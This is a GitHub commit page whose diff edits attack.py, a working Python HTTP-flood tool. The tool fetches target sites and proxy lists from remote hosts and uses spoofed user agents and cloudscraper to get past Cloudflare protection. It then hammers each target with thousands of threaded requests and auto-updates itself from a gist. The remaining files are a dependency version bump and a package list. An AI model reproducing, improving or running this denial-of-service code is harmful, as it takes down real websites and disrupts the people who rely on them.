Skip to content

Commit

Permalink
Merge pull request #3 from SterbenXIII/main
Browse files Browse the repository at this point in the history
  • Loading branch information
AlexTrushkovsky authored Feb 27, 2022
2 parents e9c9927 + fe65aa5 commit a50a00f
Show file tree
Hide file tree
Showing 3 changed files with 80 additions and 69 deletions.
146 changes: 78 additions & 68 deletions attack.py
Original file line number Diff line number Diff line change
@@ -1,12 +1,9 @@
import cloudscraper
import requests
import os
from bs4 import BeautifulSoup
from urllib.parse import unquote
from gc import collect
from loguru import logger
from os import system
from requests import get
from sys import stderr
from threading import Thread
from random import choice
Expand All @@ -15,7 +12,6 @@
from pyuseragents import random as random_useragent
from json import loads

from urllib.request import urlopen
import json
import sys

Expand All @@ -24,82 +20,96 @@
MAX_REQUESTS = 5000
disable_warnings()
def clear(): return system('cls')


logger.remove()
logger.add(stderr, format="<white>{time:HH:mm:ss}</white> | <level>{level: <8}</level> | <cyan>{line}</cyan> - <white>{message}</white>")
logger.add(
stderr, format="<white>{time:HH:mm:ss}</white> | <level>{level: <8}</level> | <cyan>{line}</cyan> - <white>{message}</white>")
threads = int(sys.argv[1])


def checkReq():
os.system("python3 -m pip install -r requirements.txt")
os.system("python -m pip install -r requirements.txt")
os.system("pip install -r requirements.txt")
os.system("pip3 install -r requirements.txt")
os.system("python3 -m pip install -r requirements.txt")
os.system("python -m pip install -r requirements.txt")
os.system("pip install -r requirements.txt")
os.system("pip3 install -r requirements.txt")


def checkUpdate():
print("Checking Updates...")
updateScraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
try:
content = updateScraper.get(url).content
if content:
data = json.loads(content)
new_version = data["version"]
print(new_version)
if int(new_version) > int(VERSION):
print("New version Available")
os.system("python updater.py " + str(threads))
os.system("python3 updater.py " + str(threads))
exit()
else:
sleep(5)
checkUpdate()
except:
sleep(5)
checkUpdate()
print("Checking Updates...")
updateScraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
url = "https://gist.githubusercontent.com/AlexTrushkovsky/041d6e2ee27472a69abcb1b2bf90ed4d/raw/nowarversion.json"
try:
content = updateScraper.get(url).content
if content:
data = json.loads(content)
new_version = data["version"]
print(new_version)
if int(new_version) > int(VERSION):
print("New version Available")
os.system("python updater.py " + str(threads))
os.system("python3 updater.py " + str(threads))
exit()
else:
sleep(5)
checkUpdate()
except:
sleep(5)
checkUpdate()


def mainth():
scraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})

scraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})

while True:
scraper = cloudscraper.create_scraper(browser={'browser': 'firefox','platform': 'android','mobile': True},)
scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
logger.info("GET RESOURCES FOR ATTACK")
content = scraper.get(choice(HOSTS)).content
if content:
data = loads(content)
else:
sleep(5)
continue
logger.info("STARTING ATTACK TO " + data['site']['page'])
site = unquote(data['site']['page'])
if site.startswith('http') == False:
site = "https://" + site
try:
attack = scraper.get(site)
if attack.status_code >= 302 and attack.status_code >= 200:
for proxy in data['proxy']:
scraper.proxies.update({'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
response = scraper.get(site)
if response.status_code >= 200 and response.status_code <= 302:
for i in range(MAX_REQUESTS):
response = scraper.get(site)
logger.info("ATTACKED; RESPONSE CODE: " + str(response.status_code))
else:
for i in range(MAX_REQUESTS):
response = scraper.get(site)
logger.info("ATTACKED; RESPONSE CODE: " + str(response.status_code))
except:
logger.warning("issue happened")
continue
while True:
scraper = cloudscraper.create_scraper(
browser={'browser': 'firefox', 'platform': 'android', 'mobile': True},)
scraper.headers.update({'Content-Type': 'application/json', 'cf-visitor': 'https', 'User-Agent': random_useragent(), 'Connection': 'keep-alive',
'Accept': 'application/json, text/plain, */*', 'Accept-Language': 'ru', 'x-forwarded-proto': 'https', 'Accept-Encoding': 'gzip, deflate, br'})
logger.info("GET RESOURCES FOR ATTACK")
content = scraper.get(choice(HOSTS)).content
if content:
data = loads(content)
else:
sleep(5)
continue
logger.info("STARTING ATTACK TO " + data['site']['page'])
site = unquote(data['site']['page'])
if site.startswith('http') == False:
site = "https://" + site
try:
attack = scraper.get(site)
if attack.status_code >= 302:
for proxy in data['proxy']:
scraper.proxies.update(
{'http': f'{proxy["ip"]}://{proxy["auth"]}', 'https': f'{proxy["ip"]}://{proxy["auth"]}'})
response = scraper.get(site)
if response.status_code >= 200 and response.status_code <= 302:
for i in range(MAX_REQUESTS):
response = scraper.get(site)
logger.info("ATTACKED; RESPONSE CODE: " +
str(response.status_code))
else:
for i in range(MAX_REQUESTS):
response = scraper.get(site)
logger.info("ATTACKED; RESPONSE CODE: " +
str(response.status_code))
except:
logger.warning("issue happened")
continue


def cleaner():
while True:
sleep(60)
checkUpdate()
clear()
collect()
while True:
sleep(60)
checkUpdate()
clear()
collect()


if __name__ == '__main__':
clear()
Expand Down
2 changes: 1 addition & 1 deletion requirements.txt
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
beautifulsoup4==4.10.0
names==0.3.0
cloudscraper==1.2.58
loguru==0.5.3
loguru==0.6.0
requests
urllib3==1.26.7
uuid==1.30
Expand Down
1 change: 1 addition & 0 deletions target/pylist.json
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[{"package": "beautifulsoup4", "version": "4.10.0", "deps": [{"package": "soupsieve", "version": "2.3.1"}]}, {"package": "names", "version": "0.3.0", "deps": []}, {"package": "cloudscraper", "version": "1.2.58", "deps": [{"package": "pyparsing", "version": "3.0.7"}, {"package": "charset-normalizer", "version": "2.0.12"}, {"package": "urllib3", "version": "1.26.7"}, {"package": "requests-toolbelt", "version": "0.9.1"}, {"package": "certifi", "version": "2021.10.8"}, {"package": "requests", "version": "2.27.1"}, {"package": "idna", "version": "3.3"}]}, {"package": "loguru", "version": "0.6.0", "deps": []}, {"package": "requests", "version": "2.27.1", "deps": [{"package": "urllib3", "version": "1.26.7"}, {"package": "idna", "version": "3.3"}, {"package": "certifi", "version": "2021.10.8"}, {"package": "charset-normalizer", "version": "2.0.12"}]}, {"package": "urllib3", "version": "1.26.7", "deps": []}, {"package": "uuid", "version": "1.30", "deps": []}, {"package": "pysocks", "version": "1.7.1", "deps": []}, {"package": "pyuseragents", "version": "1.0.5", "deps": []}]

0 comments on commit a50a00f

Please sign in to comment.